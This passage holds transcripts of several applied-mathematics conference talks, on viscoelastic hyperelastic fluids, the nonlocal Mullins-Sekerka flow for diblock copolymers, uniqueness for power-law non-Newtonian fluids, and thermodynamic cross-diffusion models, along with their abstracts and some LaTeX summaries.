And it is also compatible with the second principle formalism. Of course, that means we can make a dependence on temperature. I will not go very far in that direction because it adds a lot of complexities, but for people familiar with hyperelasticity, it will be clear. OK, just one point. I think that direction was more or less, I would say, tried by people, famous chemists in particular, Berice in the 90s, but they came up with a hyperbolic model that was not very satisfying, and it has many failures. So the connection is not direct. So now I will go back to elasto dynamics and explain to you how they introduce viscoelastic stresses in elasto dynamics. So the first point is to connect elasto dynamics with Fritz. So as you remember, Euler model could be derived according to Lagrange Hamilton principle. And in fact, if you remember about phi t as being the configuration, the placement of the configuration at phi t, one variable was not introduced, which is essential to deal with general Fritz, is the gradient, deformation gradient. Well, we use only its determinant. And of course, for Fritz, it is very practical to reduce the system of equations. So this is one equation for the deformation gradient that comes from the definition as from the placement function, and which implies the equation to the conservation node for determinant. The system can be reduced by seeing that the stress in a fluid doesn't depend on the full deformation gradient, but only on its determinant. And then that's how you come up with Euler just by erasing the first equation. And you have a reduced system that has been worked on very much by people around Marsden, I think. You make different material assumptions, and you came up with a different reduced version of the Lagrange Hamilton principle. The point is that here, I want to make the connection with elasticity, and I will not forget about, I will not forget the first equation. And I will show you how you go to Euler-Wahne description of hyper-elastic materials. Well, just by choosing an internal energy that does not depend only on the determinant, but as is well known for the Ney-Wikian model, on the full deformation gradient here in a convex way. So you have that Cauchy stress, and this is the Euler-Wikian description of hyper-elastic materials of the elastodynamic hyper-elastic materials. And this is completely equivalent at the level of smooth solution with the material description. So here I introduce what is... I'm sorry to interrupt you. You're slightly over time already, so please come to an end soon. Sorry. Okay. So this is the usual connection, and to finish in a second, I need to introduce... Okay. So I need to introduce viscoelastic stresses. So I do that by introducing an additional material variable, which is reminiscent of what people do when they introduce the conformation tensor. They introduce what, a second level of description to explain where thermodynamics and exchange with forces from a different level, polymer extensions could express. And the good point is that, in fact, we can introduce something which is only an advected material variable, which depends on the reference configuration, plus a source terms. This is completely compatible with hyper-elasticity if we look here at the stress, which is given by that L-modes free energy. And the connection with KBKZ is clear. In fact, KBKZ has just rephrased that differential equation as using its explicit solution and additional assumption to put the formula here inside 12 instead of A. 
But it makes it integral and then very difficult to solve. What I suggest is to keep the level of description at the pure differential system of conservation laws. Well, it allows, of course, multi-time solution in the usual polyconvex setting. So the difficulty is to show that we have an equation, we have an energy which is actually polyconvex in all variables, including the new one. In fact, the new one is not very practical to show a polyconvexity. You have to change it to anything which is a function of it because it is simply advected. And using, for instance, Y, which is the inverse of the square, you can actually show that you are polyconvex and then you have a well-posed model, this is the equation for the energy. You have a well-posed model for small-time smooth motion. And it offers, I think, many entry points for such questions as how to deal with compressibility. And it means actually account for non-isothermal flows where there are some configuration dependence on the elasticity and non-polymer conformations. And of course, it offers also a link with different imperfections in fluids. Because this quailasticity, of course, it is also useful for rubber-like fluids. But it is also being looked at for many glassy systems, which are not only simple dilute polymer fluids, but which have some more different non-viscoelastic stresses. So just the parameter A, I think, is a good statistical parameter to go in that direction. And we stop here because I'm running out of time, but I am ready to answer questions. And I suggest you look at an article just in press in M2AN if you want all the heavy details. Thank you very much.
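For completeness, the Eulerian description of hyperelastic materials that the proposed model builds on can be summarized as follows; this is a standard formulation given as a sketch, not the exact system of the M2AN paper.
\begin{align*}
&\partial_t\rho + \nabla\cdot(\rho v) = 0, \qquad \rho\big(\partial_t v + (v\cdot\nabla)v\big) = \nabla\cdot\sigma, \qquad \partial_t F + (v\cdot\nabla)F = (\nabla v)\,F,\\
&\sigma = \rho\,\frac{\partial e}{\partial F}\,F^{T}, \qquad e = e(\det F)\ \Longrightarrow\ \sigma = -p\,\mathbb{I} \ \text{ with } \ p = -\rho\,(\det F)\,e'(\det F),
\end{align*}
so a fluid is the special case where the internal energy depends on the deformation gradient only through its determinant, and the viscoelastic extension described in the talk lets the energy depend in addition on an advected material-metric variable with a relaxation source term.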
In continuum models for non-perfect fluids, viscoelastic stresses have often been introduced as extra-stresses of purely-dissipative (entropic) nature, similarly to viscous stresses that induce motions of infinite propagation speed. A priori, it requires only one to couple an evolution equation for the (extra-)stress with the momentum balance. In many cases, the apparently-closed resulting system is often not clearly well-posed, even locally in time. The procedure also raises questions about how to encompass transition toward alastic solids. A noticeable exception is K-BZK theory where one starts with a purely elastic fluids. Viscoelasticity then results from dissipative (entropic) stresses due to the relaxation of the fluids'"memory". That K-BKZ approach is physically appealing, but mathematically quite difficult because integrals are introduced to avoid material ('natural') configurations. We propose to introduce viscoelastic stress starting with hyperelastic fluids (like K-BKZ) and evolving material configurations (unlike K-BKZ). At the price of an enlarged system with an additional material-metric variable, one can define well-posed (compressible) motions with finite propagation speed through a system of conservation laws endowed with a "contingent entropy" (like in standard polyconvex elastodynamics).
10.14288/1.0398148 (DOI)
Okay. Sorry. Okay. I want to apologize because I am not going to talk about complex fluids; nevertheless, the model I am going to talk about is related to materials science, and in particular to the nanostructures which are formed in diblock copolymers. Diblock copolymers are chains of two different monomers, say of type A and of type B, which, depending on the chemical interaction between the two monomers, on the temperature, and on the volume fraction of one monomer with respect to the other, exhibit different nanostructures, which are quite interesting from the mathematical point of view. You can see two typical situations: on the left hand side you see a lamellar structure, and on the right hand side you see the blue monomer forming spherical structures surrounded by the red one. Of course, in both cases you have a thin interface separating the two structures, the two monomers, but the geometrical features of these structures are pretty clear. However, the situation is more complicated than this, because other structures do appear: one of the two monomers forms spherical structures inside the other one, or cylinders, or more complicated structures such as gyroids and diamonds. This depends on the relative amount of the mass of one monomer with respect to the total mass, and finally, when the two masses are almost comparable, you get lamellar structures. Okay, the interesting point is that, sorry, but do you see all the screen, also the bottom? Yes. Okay. What is interesting from the mathematical point of view is that all these structures are boundaries of sets with constant mean curvature. In order to explain why precisely these geometrical structures appear, a model was proposed a few years ago, precisely in 1986, by Ohta and Kawasaki. It is a very simple model but, as I want to explain, it is quite effective in explaining the configurations that you see. Okay, so omega is your container, the container of your diblock copolymer, and u is a function with values between minus one and one which describes the density: you have u equal to one in a region where monomer A is, minus one where monomer B is, and of course you have intermediate values between minus one and one on the interface. In this model, the idea is that the configurations that you observe are those which are local minimizers of an energy made up of two contributions. The first one is an attractive short range interaction, which is given by a functional of the type of the Cahn-Hilliard energy, or Modica-Mortola if you want to call it this way, in which epsilon is a very small parameter. So if you want to make this part of the energy as small as possible, the best thing you can do is to take the function u as close as possible to one and minus one, so to stay on the pure phases. However, if you are on the pure phases and you have to pass from one phase to the other, you have to pay a gradient; but you do not pay so much, because this gradient term, the integral of the square, is multiplied by the small epsilon. On the other hand, the second term is given by the solution of the Laplace equation with the density function u on the right hand side: you take the square of the gradient of the solution, times a positive constant.
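In formulas, the functional just described, and the sharp-interface limit that appears a little later in the talk, are usually written as follows; the normalization of the constants here is generic and may differ from the speaker's slides.
\begin{align*}
&E_\varepsilon(u) = \int_{\Omega}\Big(\varepsilon\,|\nabla u|^2 + \frac{1}{\varepsilon}\,W(u)\Big)dx + \gamma_0\int_{\Omega}|\nabla v|^2\,dx, \qquad -\Delta v = u - \bar{u},\\
&E_\varepsilon \ \xrightarrow{\ \Gamma\ }\ E(E) = c_W\,\mathrm{Per}(E;\Omega) + \gamma\int_{\Omega}|\nabla v|^2\,dx, \qquad u = \chi_E - \chi_{\Omega\setminus E},
\end{align*}
where $W$ is a double-well potential vanishing exactly at $\pm 1$, $\bar{u}$ is the average of $u$, and $c_W$ is a constant depending only on $W$; after normalizing the perimeter coefficient to one, the nonlocal coefficient is rescaled accordingly.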
Okay, as I said, in the Ohta-Kawasaki model epsilon is very small, while gamma zero is a constant which depends on the chemical properties of the materials and on the temperature. If you want to study this problem from the mathematical point of view, in order to understand the formation of these configurations, it is convenient to let epsilon go to zero, in which case you can prove, in a precise sense which is the Gamma-convergence sense, that the minimum problems attached to these energies E_epsilon converge to the minimum problem of a limit energy, where this time the function u takes only the two values minus one and one, so you have pure, separated phases. The constant, when passing to the limit, changes by this factor three over sixteen, but the first part of the energy converges to one half of the jump of the function u across the interface; since the function u now takes only the two values minus one and one, this term is nothing else than the perimeter, so the area of the interface separating the two phases. In fact the function u is nothing else than the difference of the characteristic function of the set E occupied by the phase A minus the characteristic function of the set omega minus E occupied by the phase B. So in the end you have a sort of geometrical problem in which you have this area term plus this nonlocal term given by this potential, where again you take the square of the gradient of the solution of the Laplace equation with the density function on the right-hand side. If you want to understand the problem from the mathematical point of view, it is convenient to work with periodicity conditions. There are two reasons. The first reason is that periodic structures are what you physically observe. The second reason is that people working on this problem conjecture that equilibria of the previous energy, the limit of the Ohta-Kawasaki energy when epsilon goes to zero, should be periodic; I don't want to discuss this point, the conjecture has been only partially solved. But okay, let's go for the periodicity condition. So this is your general energy: the perimeter of the interface inside the flat torus, your unit cell, plus the squared gradient of this function v, which is, as I said, the solution of minus the Laplacian of v equal to u minus the volume fraction of your set E, which in the flat torus is just the difference of the volume of E minus the volume of the complement. One problem that you want to understand, in order to explain the configurations that you saw in the picture, is under which conditions stable critical points of this energy are local minimizers. One addresses this problem by calculating the second variation of this energy; this has been done by Choksi and Sternberg in 2007. There is also a series of papers by Ren and Wei, where they prove that certain particular configurations are stable critical points and are local minimizers with respect to some special variations. What do I mean by local minimizer? I mean that you take another configuration F with the same volume and you measure the distance between your local minimizer E and the configuration F by taking the volume of the symmetric difference, up to translations, because we are working in a periodic setting.
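A hedged sketch of the sharp-interface limit functional in the periodic setting, as I understand it from the description above (the notation is mine):
\[
J(E) \;=\; P\big(E;\mathbb{T}^N\big) \;+\; \gamma\int_{\mathbb{T}^N}|\nabla v_E|^2\,dx,
\qquad -\Delta v_E = u_E - m,\quad u_E = \chi_E - \chi_{\mathbb{T}^N\setminus E},\quad m = |E|-|\mathbb{T}^N\setminus E|,
\]
where P(E; T^N) is the perimeter of E in the flat torus, i.e. the area of the interface separating the two phases.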
Then you want the energy of E to be strictly lower than the energy of F. You can see that, for a critical point, the mean curvature — or equivalently the sum of the principal curvatures — plus four times the constant gamma appearing in the nonlocal term of the energy, times the function v, is constant. Since in practice this constant gamma is very small, this already gives you an idea of why the configurations you observe look very much like constant mean curvature surfaces: for local minimizers of this energy the mean curvature is almost constant. But in order to talk about stable critical points you have to introduce the second variation, which you can do very easily by fixing a vector field X and considering the associated flow. Be careful: we want to study local minimizers under a volume constraint, so in order to be sure that the family of deformations you get by solving the associated flow keeps the volume constraint, you have to assume that the vector field X has zero divergence, at least in a small neighborhood of your set. Then you define the second variation as the second derivative of the energy at time zero, and what you get is a first term, which is the second variation of the area, plus two other terms coming from the nonlocal part; here B is the second fundamental form, so |B| squared is the sum of the squares of the principal curvatures, and G is the Green function associated to the Laplacian in the periodic setting. If you have a critical point, that is, a solution of the Euler-Lagrange equation, you call it stable if this second variation is strictly positive for all vector fields with zero divergence in a neighborhood of the boundary of E. Equivalently, you can regard this as a quadratic form acting on a function phi, because as you can see the quadratic form actually depends only on the normal component X dot nu of the vector field X, which you replace by a function phi. What you want is that the quadratic form you obtain is strictly positive for every nonzero phi satisfying the constraint coming from the divergence-free condition, which translates into the condition that the integral mean of phi over the boundary is equal to zero. The first result one gets in this framework is the following, which I proved a few years ago with Emilio Acerbi and Massimiliano Morini, and which tells you that any critical configuration with positive second variation in this sense is a strict local minimizer; moreover, if you take another configuration with the same volume, close in distance to the set E, then the energy not only increases, it increases by an amount of the order of the square of the distance.
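Before continuing, a hedged reconstruction of the criticality and stability conditions used in this theorem; the precise constants follow my reading of the normalization in the talk and should be taken as indicative.
\[
H_{\partial E} + 4\gamma\,v_E = \text{const} \quad\text{on }\partial E,
\]
\[
\partial^2 J(E)[\varphi] \;=\; \int_{\partial E}\big(|\nabla_\tau\varphi|^2 - |B|^2\varphi^2\big)\,d\mathcal H^2
\;+\; 8\gamma\int_{\partial E}\int_{\partial E}G(x,y)\,\varphi(x)\,\varphi(y)\,d\mathcal H^2_x\,d\mathcal H^2_y
\;+\; 4\gamma\int_{\partial E}\partial_\nu v_E\,\varphi^2\,d\mathcal H^2,
\]
and strict stability means that this quadratic form is strictly positive for every nonzero φ with zero integral mean on ∂E.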
Everything I have said up to now is because I want to consider the evolutionary counterpart of the model, which is the so-called nonlocal Mullins-Sekerka flow, in which you study a smooth flow of sets solving the following equation. Here V_t is the normal velocity of the boundary, and on the right-hand side you see the jump of the normal derivative of a function w which is harmonic outside the boundary of the evolving set and which on the boundary is equal to the mean curvature plus four gamma times the function v, where v is, as before, the solution in omega of the equation minus the Laplacian of v equal to u minus its integral mean; recall that u is the function which is one on E and minus one on the complement of E. Note that this flow is volume preserving: if you take the derivative of the volume of the evolving set you get the integral over the boundary of the normal velocity, that is, of the jump of the normal derivative of w, and this is equal to zero. The flow can be obtained as the limit, when epsilon goes to zero, of the gradient flow of the diffuse Ohta-Kawasaki energy; this was proved by Alikakos, Bates and Chen in 1994 for gamma equal to zero, and by Le in the general case gamma different from zero. So this sharp-interface flow, the nonlocal Mullins-Sekerka flow, can be seen as the H to the minus one half gradient flow of the sharp-interface Ohta-Kawasaki energy, which in the case gamma equal to zero — when the energy coincides with the surface energy — coincides with the Hele-Shaw flow with surface tension. Let me remark that this is a third-order parabolic equation, because the jump of the normal derivative of w is essentially related to the one-half Laplacian of the mean curvature. What are the features of this flow? Even though the flow is instantaneously regularizing, singularities may appear in finite time; there is no comparison principle — the equation is a third-order nonlinear parabolic equation — and, differently from the mean curvature flow, convexity is not preserved along the flow. Local-in-time existence was proved for this equation only in 2002.
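In formulas, the flow just described should read as follows — a hedged reconstruction, with my choice of normalization matching the criticality condition above:
\[
V_t = \big[\partial_\nu w_t\big]\ \text{ on }\partial E_t,\qquad
\Delta w_t = 0\ \text{ in }\mathbb T^3\setminus\partial E_t,\qquad
w_t = H_{\partial E_t} + 4\gamma\,v_{E_t}\ \text{ on }\partial E_t,
\]
with v_{E_t} solving $-\Delta v_{E_t} = u_{E_t} - m$ as before; here V_t is the outer normal velocity and $[\partial_\nu w_t]$ the jump of the normal derivative of w_t across the interface. Since $\int_{\partial E_t}[\partial_\nu w_t]\,d\mathcal H^2 = 0$ by the divergence theorem, the volume of E_t is preserved along the flow.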
Okay, and just to finish, because I think my time is over: the result I want to mention, which is a consequence of the stability result I mentioned before, concerns the stability of solutions of this equation. It is a result which was proved by Acerbi, Julin, Morini and myself last year, and it goes like this. Assume that F is a strictly stable set, and that you start the flow from an initial datum which is close in C^1 to this strictly stable set and such that, for the initial datum, the gradient of the quantity given by the mean curvature plus four gamma times the function v is very small. Remember that for your strictly stable set this quantity is constant, so the condition tells you, roughly speaking, that the L^2 norm of the gradient of the mean curvature of your initial datum is not too big. Then the flow starting from this initial datum is defined for all times and converges exponentially fast, not precisely to the strictly stable set, but to a translate of it. The reason why it converges to a translate is that in the flow there is also a translation component: not only is the boundary of the evolving set changing, but together with the boundary you are also translating by a quantity which, one can prove, is smaller and smaller provided you start close to the strictly stable set. Okay, I stop here. Sorry for being a little bit late, and thank you for your attention. Thank you very much.
The nonlocal Mullins-Sekerka flow can be seen as the $H^{-\frac12}$-gradient flow of the so-called sharp-interface Ohta-Kawasaki energy. In this talk we will show that three-dimensional periodic configurations that are strictly stable with respect to this energy are exponentially stable also for the nonlocal Mullins-Sekerka flow.
10.14288/1.0398153 (DOI)
So I want to speak about the uniqueness of non-Newtonian fluids with critical power law, and I will consider the following model of generalized Newtonian flow. We have u for the velocity, p for the pressure, f for the external forces, and the extra stress tensor is T. Here Ladyzhenskaya in the 70s suggested that T could be of a form with p-growth, where p is some number larger than 1, and the typical examples would be like T1 or T2 of course. If we set p equal to 2, we obtain the Navier-Stokes system, and as I mentioned, if p is different from 2, it is the model stated by Ladyzhenskaya in her book from '69. So we have the equation, and then we can think about the solution and its regularity. If we test the equation and integrate by parts, we obtain some kind of energy inequality, assuming that everything goes well, because the convective term which is here disappears due to its structure and also the pressure disappears. So it is reasonable to assume that the solution satisfies this kind of energy inequality, and in particular it should have the natural regularity: we will assume that the solution is in L-infinity L2 and in Lp W1,p. A solution that satisfies these two things we will call a Leray-Hopf solution of our problem. Okay, so now I would like to show you a brief summary of the existence of solutions. Since there has been extensive work on the problem since the 70s, I will surely forget someone, so I apologize in advance. The studies started with Ladyzhenskaya in the 70s, and she proved that if p is larger than or equal to 11 over 5, then we have existence of solutions; the proof was based on monotone operator theory and compactness. In order to deal with the elliptic term we use monotone operator theory; in order to deal with the convective term one needs compactness of some embedding, and everything works due to the fact that, for p larger than or equal to 11 over 5, the convective term is sufficiently good that the weak solution itself is an admissible test function. Then, taking just some results from the list: Nečas and his collaborators around '93 studied whether it's possible to obtain some information by formally testing the system with the Laplacian of the solution. It appeared that it is indeed so, and therefore they showed that for p larger than 9 over 5, in the case of periodic boundary conditions, one gets some higher fractional differentiability which is below the regularity scale of a natural strong solution, but which allows one to pass to the limit and identify the limit in the elliptic term in the construction. In this way they proved the existence of solutions for p larger than 9 over 5. And I should say that this method also gives some regularity, but for larger p. So this was for periodic boundary conditions. Then a similar method was applied also to homogeneous Dirichlet boundary conditions, and it was shown that the solution exists for p larger than 2, and that it is possible to show higher regularity in space if p is larger than or equal to 9 over 4. Then there appeared two other methods, one based on L-infinity test functions and the other on Lipschitz test functions, where the problem with the passage to the limit in the approximations of the elliptic term was overcome by modifying the weak solution suitably, in such a way that it is, also for such small p, a suitable test function.
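Before going on, a hedged sketch, in my own notation, of the system and of the natural energy class just mentioned; the particular form of the extra stress below is only one representative example of the p-growth class, not necessarily the one on the slide (pressure denoted π to avoid clashing with the exponent p).
\[
\partial_t u + \operatorname{div}(u\otimes u) - \operatorname{div} T(Du) + \nabla \pi = f,\qquad \operatorname{div} u = 0,\qquad T(Du)=\nu\,(1+|Du|)^{p-2}Du,
\]
and testing formally with u itself gives the energy inequality
\[
\tfrac12\|u(t)\|_{L^2}^2 + \int_0^t\!\!\int_\Omega T(Du):Du\,dx\,ds \;\le\; \tfrac12\|u_0\|_{L^2}^2 + \int_0^t\!\!\int_\Omega f\cdot u\,dx\,ds,
\]
so that a Leray-Hopf solution naturally lives in $L^\infty(0,T;L^2)\cap L^p(0,T;W^{1,p})$.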
I just want to say that this last result, for p larger than 6 over 5, is in a sense a terminal result, because this bound corresponds to the fact that W1,p is compactly embedded into L2, and this is the border for the compactness which allows one to deal with the convective term. So this is, let us say, the optimal result about the existence of Leray-Hopf solutions. Then we have some other results on the existence of other types of solutions. I should mention that there were studies of measure-valued solutions by Nečas and his group, and it was proved that measure-valued solutions exist for p larger than 6 over 5. Recently there appeared a new notion of dissipative solution which goes below the bound 6 over 5: it only requires p larger than one. These are the dissipative solutions of Anna Abbatiello and Eduard Feireisl, where in the definition of these solutions there appears one more additional term in the formulation of the equation, which somehow captures the possible trouble with the passage to the limit in the elliptic term. These solutions also satisfy some kind of energy inequality, but again with one additional term — a defect term, so to speak. Very recently there appeared an article by Burczak, Modena and Székelyhidi, and they show that there exist energy solutions; for them an energy solution is a solution that satisfies the equation in the distributional sense and has the correct regularity, the regularity mentioned before, but it does not need to satisfy the energy inequality. They showed that such energy solutions exist for p larger than one by the method of convex integration. So this goes deeply below six over five. Now I would like to speak about uniqueness. The basic approach to the uniqueness of solutions is the following: we have two solutions corresponding to two different right-hand sides, and we assume that we can test the problem with the solution itself, so p larger than or equal to 11 over 5 — this is where this number appears. If we subtract the two equations and test with the difference of the solutions, we obtain an inequality where on the right-hand side we have nice terms: the difference of the right-hand sides is okay, and then there is a remainder from the convective term, which is basically the L2 norm of the difference squared times the W1,p norm of u2 to some power. We see that this is prepared for an application of the Gronwall inequality, provided the function which appears here belongs to L1 in time. So if the second solution u2 belongs to a suitable space of the type Lq W1,p, then we obtain uniqueness; regularity of solutions immediately implies uniqueness in this sense. So let us discuss uniqueness in the case of periodic boundary conditions. If you look at Ladyzhenskaya-type estimates, then for p larger than or equal to five over two we can relatively easily obtain uniqueness. If you want to go below, you have to improve the regularity somehow, and that's why I mentioned the result by Nečas and his collaborators from '93: as I already said, they test the equation with the Laplacian of u and try to get some regularity out of this, and it appears that, in the case of periodic boundary conditions, for p larger than or equal to 11 over 5 they obtain such regularity that uniqueness is implied.
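A hedged sketch of the Gronwall step behind this "regularity implies uniqueness" reasoning; the exponent alpha below only indicates the structure and is not meant to be sharp.
\[
\frac{d}{dt}\|u_1-u_2\|_{L^2}^2 \;\le\; C\,\|f_1-f_2\|^2 \;+\; C\,\|u_1-u_2\|_{L^2}^2\,\big(1+\|\nabla u_2\|_{L^p}\big)^{\alpha},
\]
so that if $t\mapsto\big(1+\|\nabla u_2(t)\|_{L^p}\big)^{\alpha}$ belongs to $L^1(0,T)$, Gronwall's lemma gives $u_1\equiv u_2$ whenever $f_1=f_2$ and the initial data coincide.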
And you see that this result is actually in a sense optimal, because in the recent article by Burczak, Modena and Székelyhidi, the already mentioned energy solutions that do not need to satisfy the energy inequality are shown to be non-unique: they show that for a given, suitably chosen initial value and right-hand side there are many energy solutions if p is less than 11 over 5. In this article there is one more interesting result, namely about solutions that lie in the correct regularity class and also satisfy the energy inequality: it is shown that if p is less than 6 over 5, then for some suitably chosen initial value and right-hand side the Leray-Hopf solution is not unique. Then, in the case of homogeneous Dirichlet boundary conditions, the regularity theory is much more technical, so the results are slightly different. Again, the easy result holds for p larger than or equal to 12 over 5. The result of testing with the Laplacian was applied by Málek and his collaborators in 2001, and they obtained that if p is larger than or equal to 9 over 4, then in the case of homogeneous Dirichlet boundary conditions one obtains sufficient regularity in space in order to get uniqueness. Concerning the non-uniqueness of energy solutions for p less than 11 over 5 in this setting, this result is not yet available; it depends on whether the group dealing with convex integration will write it down or not. I don't know if it holds, but I would think that it should. We see that in the case of homogeneous Dirichlet boundary conditions there is some gap, because 9 over 4 is larger than 11 over 5, so there is a gap concerning uniqueness. So we can ask whether the weak solution is unique for p larger than or equal to 11 over 5, and this is what I address now. We have already seen what we get if we are allowed to test with the time derivative: for p larger than or equal to 12 over 5 we obtain sufficient regularity to get uniqueness, but we don't know how to decrease this bound. If we think about some other suitable tests, say testing with the second time derivative, the situation is even worse: the p for which it works is larger than 5 over 2. So we don't know how to deal with these. What we try instead is to test with some fractional time derivatives, in the sense that we test with time differences and then divide by a suitable power of the time step. For this we need the definition of Nikolskii spaces: the Nikolskii space is a space of functions that, in some sense, have s time derivatives, where s is between zero and one, and s is connected with the fact that after dividing the norm of a time difference of the solution in Lp in space by a power of h, this quantity is bounded uniformly with respect to h. So we see that the Nikolskii spaces are relatively easy to deal with.
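For reference, a hedged sketch of the Nikolskii-type seminorm being invoked; the integrability index q and the target space X are placeholders of mine.
\[
\|u\|_{N^{s,q}(0,T;X)} \;=\; \|u\|_{L^q(0,T;X)} \;+\; \sup_{0<h<T} h^{-s}\Big(\int_0^{T-h}\|u(t+h)-u(t)\|_{X}^{q}\,dt\Big)^{1/q},\qquad 0<s<1,
\]
so membership in a Nikolskii space is checked simply by bounding finite differences in time, uniformly with respect to the step h.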
So what we observe is the following. Rewrite the equation in parabolic form, and then we see that on the right-hand side the main troublemaker is the convective term. Now we realize that if the convective term, that is, the right-hand side, belongs to some Nikolskii space with a certain delta, then this somehow transfers to the regularity of the solution u. We obtain that the regularity of u is improved: originally we had L-infinity L2, and now we obtain some Nikolskii differentiability in time with values in L2; and originally we had Lp W1,p, but now we obtain again some differentiability in time of order sigma with some integrability tau. So you see, regularity of the right-hand side improves regularity of the solution. The second observation is the reverse: if we have the information that appears here as a conclusion, we can ask whether it improves the convective term, and it is indeed so. From the regularity of u we obtain regularity of the convective term for some suitable new delta, and it appears that this new delta is larger than the previous one, so we can iterate. We iterate this procedure, and for p larger than 11 over 5 this is sufficient: in case the initial datum is only in L2 we obtain local-in-time regularity of the solution, and if the initial datum is better we obtain global regularity of the solution, which then implies uniqueness for p larger than 11 over 5. Of course, the case of the critical exponent p equal to 11 over 5 is still not covered — unfortunately this iteration doesn't work for p equal to 11 over 5, so one needs to do something else. The something else is an initial improvement of regularity by some Gehring argument, the Gehring lemma. What we need is to obtain, locally in time, a certain kind of inequality which then, immediately by the Gehring lemma, improves the regularity of u in time just by a small epsilon; but this epsilon then allows us to start the iteration process and obtain sufficient regularity for uniqueness. So what one does is test the equation with u minus some time-independent function capital U, use the good structure of the convective term — it is very important that the convective term doesn't make problems in these considerations — and obtain this inequality, which is good up to the time derivative; but one can estimate also this time derivative so that it disappears. What remains is exactly the inequality in the first line, which is prepared for an application of the Gehring argument, so we obtain an epsilon improvement of the regularity of the solution in time. Then we start the iteration and obtain the theorem, which is the same as the previous one, but now for p equal to 11 over 5. I think that my time is over, so I will stop here. I wanted to say something about the convective Brinkman-Forchheimer model, but I ran out of time. Thank you for your attention. Thank you very much.
We deal with the flows of non-Newtonian fluids in the three-dimensional setting subjected to the homogeneous Dirichlet boundary condition. Under the natural monotonicity, coercivity and growth conditions on the Cauchy stress tensor expressed by the critical power index $p=\frac{11}{5}$ we show that a Gehring type argument is applicable, which allows us to improve the regularity of any weak solution. Improving the regularity of weak solutions further along a regularity ladder allows us to show that the solution actually belongs to a uniqueness class, provided the data of the problem are sufficiently smooth. We also briefly discuss whether a similar technique is applicable to the critical convective Brinkman-Forchheimer equation.
10.14288/1.0398150 (DOI)
to the organizers for inviting me, since in fact I would not have been able to go to Banff in normal times — it's now a teaching period — so it's nice to sit at home and be at the same time in Banff. Okay, so as already mentioned, I would like to speak about a fluid model for mixtures, which is in fact a cross-diffusion system. In this talk I will present two models, and the main feature is that I have temperature in them. The physical setting is as follows: I have a fluid consisting of n components, and I assume that there is no mean or barycentric velocity, so this vanishes — it can be criticized, but I assume it in order to avoid having the Navier-Stokes equations included. As I said, the main feature is that the temperature is variable, so I'm considering heat conduction. In this presentation, just to simplify, I neglect reaction terms. This situation can be modeled by so-called Fick-Onsager equations: I have conservation equations for the partial masses rho_i, with current densities which are just linear combinations of the gradients of the so-called thermochemical potentials — I explain on the next slide what this means — with some coefficients M_ij, which give the Onsager matrix. And I have a second equation, the equation for the temperature, or here for the energy density, which depends on all the partial densities and the temperature theta, and the heat flux is also given as such a linear combination. This situation requires some further comments, since E and the q_i's are not defined up to now, and I will do it in a thermodynamically consistent way by giving the Gibbs free energy. It's just a function which depends on these variables; the thermochemical potentials are given by the quotient of the chemical potential — which is just the partial derivative of the free energy with respect to the partial densities — and the temperature, and the energy density is given by this expression. These kinds of systems are rather well known in thermodynamics; they can be derived in the isothermal or in special non-isothermal cases, and I've given here some references, especially from the French and Italian schools. Up to now we have been interested in studying cross-diffusion systems, but we did some analysis only for the isothermal case: Dieter Bothe, for instance, did something, and also with Ines Stelzer we proved something just for these equations here, not for the heat equation or the energy equation. Okay, so I will not consider this in full generality, but I will just study two special models in which the main mathematical difficulty is that the matrices M or N are only positive semi-definite, so they may degenerate, and the question is how to deal with this. For that I need some techniques from fluid dynamics, and maybe that's interesting. Okay, so the first model is again the Fick-Onsager model, a bit specified: the M_ij's appear here again, but now the other matrix just consists of these vector components M_i times the temperature theta, and the energy equation is then given by this expression, where I have the M_j's times the thermochemical potentials, and I have the heat conductivity kappa here, this term. I have some initial data, I'm considering everything in a bounded domain, and I impose no-flux boundary conditions just to simplify things.
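A hedged reconstruction, in my own notation, of the Fick-Onsager structure being described; the signs and the precise form of the heat flux are my choices and only indicate the structure.
\[
\partial_t \rho_i \;=\; \operatorname{div}\Big(\sum_{j=1}^{n} M_{ij}(\rho,\theta)\,\nabla q_j\Big),\qquad
\partial_t E(\rho,\theta) \;=\; \operatorname{div}\Big(\kappa(\rho,\theta)\,\nabla\theta + \sum_{j=1}^{n} N_j(\rho,\theta)\,\nabla q_j\Big),
\]
with no-flux boundary conditions, where the thermochemical potentials are
\[
q_i \;=\; \frac{1}{\theta}\,\frac{\partial h}{\partial \rho_i}(\rho,\theta),
\]
h being the free energy density and E the associated energy density.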
So here the main feature of this model is that I assume that the sum of all these fluxes is zero, which means that the sum of all the partial densities is constant in time; the total mass density rho, defined just as the sum, is the same as for the initial datum, so the total mass density does not change in time. For these models I need to specify the free energy in order to specify all the other quantities, and I assume that I have this rho log rho term and a term which depends on the temperature — I think I've forgotten the log here, it should be theta times log theta minus one, sorry for the typo. Then I can compute the thermochemical potentials explicitly, so they are given by these expressions, and the energy density is that of an ideal gas: the total mass density times the temperature. What's interesting are then the assumptions on the matrix: it is symmetric, because this is the Onsager relation, and since I assume that the sum of the fluxes is equal to zero, I need to assume that these two sums here are also equal to zero, which means that the kernel of this matrix is non-trivial. Then it's clear that I don't get all the estimates I want to have, and this is expressed in this kind of coercivity assumption: I assume that the matrix is only coercive on the complement of the linear hull, or span, of the vector consisting just of ones. And I allow for a second degeneracy — the matrix is clearly degenerate on this kernel, this term here vanishes — and on the right-hand side I also assume that when rho_i is equal to zero, so when I have vacuum, then again I do not have any information. Okay, still we can do something, but before that let me mention some ideas about why we assumed this. Let me go back to these assumptions: that we have this projection is natural, because of the assumptions needed to set up the model; the degeneracy in rho_i here I just introduced since there is a paper by Pierre-Dierry, who mentioned that in order to model dilute gases or gas mixtures it would be appropriate to include these kinds of terms — he did it in a much more general approach, here it's just that example. The main feature is now that we get some estimates coming from the entropy density; it's just the derivative of the free energy with respect to the temperature, given by this expression here, and when you take the derivative with respect to time along solutions of the system, then you get this expression here: you get some information on the gradient of the temperature, and you get some mixed information on the thermochemical potentials. I will explain to you how we treat this. First let me show you the existence result, for which I need some assumptions on the coefficients, which are more or less satisfied in special situations. The most restrictive assumption may be the one on the conductivity, since here I do not allow for degeneracy and I need a special growth like theta squared; this is because of some estimates. Then we get a global-in-time weak solution, which is bounded from below and above, with a strictly positive temperature, and we get some regularity which is natural for weak solutions.
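A hedged, schematic reconstruction of the free energy and of the entropy balance being described; the exact constants, signs and the precise form of the dissipation terms are assumptions of mine and only indicate the structure.
\[
h(\rho,\theta) \;=\; \sum_{i=1}^{n}\rho_i\log\rho_i \;+\; \Big(\sum_{i=1}^{n}\rho_i\Big)\,\theta\,(\log\theta-1),
\]
and, along smooth solutions, an entropy balance of the schematic form
\[
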